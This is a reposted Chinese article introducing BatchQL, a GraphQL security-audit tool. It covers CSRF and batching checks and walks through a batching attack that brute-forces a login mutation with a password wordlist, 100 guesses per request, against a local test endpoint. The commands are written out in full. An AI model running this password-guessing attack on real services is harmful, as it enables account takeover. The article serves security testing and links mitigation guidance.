使用BatchQL对GraphQL安全性进行检测

admin
admin
admin
101095
文章
87
评论
2021年10月18日10:00:50评论103 views字数 2053阅读6分50秒阅读模式

关于BatchQL

BatchQL是一款功能强大的GraphQL的安全审计工具,可以通过执行Batch GraphQL查询和输入变异数据来了解目标GraphQL应用的安全情况。该工具基于Python开发,其实现代码并不复杂,因此欢迎社区的广大研究人员和开发人员贡献自己的代码。

检测内容

当前版本的BatchQL支持检测下列内容:

支持各类查询方式;

模式建议检测;

CSRF检测

基于查询名称的Batching;

基于查询JSON列表的Batching;

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/assetnote/batchql.git




工具使用


信息枚举


❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyanceCSRF GET based successful. Please confirm that this is a valid issue.CSRF POST based successful. Please confirm that this is a valid issue.Query name based batching: GraphQL batching is possible... preflight request was successful.Query JSON list based batching: GraphQL batching is possible... preflight request was successful.Most provide query, wordlist, and size to perform batching attack.




Batching攻击


首先,保存一个包含有目标GraphQL查询的文件,例如acc-login.txt:


mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
  }




接下来,运行下列命令来执行GraphQL Batching攻击:


❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080




上述命令将实现下列内容:


1、从一个本地文件执行特定的请求:


--query acc-login.txt




2、指定一个字典:


--wordlist passwords.txt




3、指定变量输入(使用替换识别符):


-v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}




4、指定Batch大小:


--size 100




5、指定目标节点:


-e http://re.local:5000/graphiql




6、指定一个代理:


-p localhost:8080




项目地址


BatchQL:【点击阅读原文】


参考资料


https://blog.assetnote.io/2021/08/29/exploiting-graphql/


https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application


https://lab.wallarm.com/graphql-batching-attack/


https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks










使用BatchQL对GraphQL安全性进行检测
































精彩推荐































使用BatchQL对GraphQL安全性进行检测
























使用BatchQL对GraphQL安全性进行检测



使用BatchQL对GraphQL安全性进行检测



使用BatchQL对GraphQL安全性进行检测使用BatchQL对GraphQL安全性进行检测









原文始发于微信公众号(FreeBuf):使用BatchQL对GraphQL安全性进行检测

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月18日10:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用BatchQL对GraphQL安全性进行检测https://cn-sec.com/archives/586746.html

发表评论

匿名网友 填写信息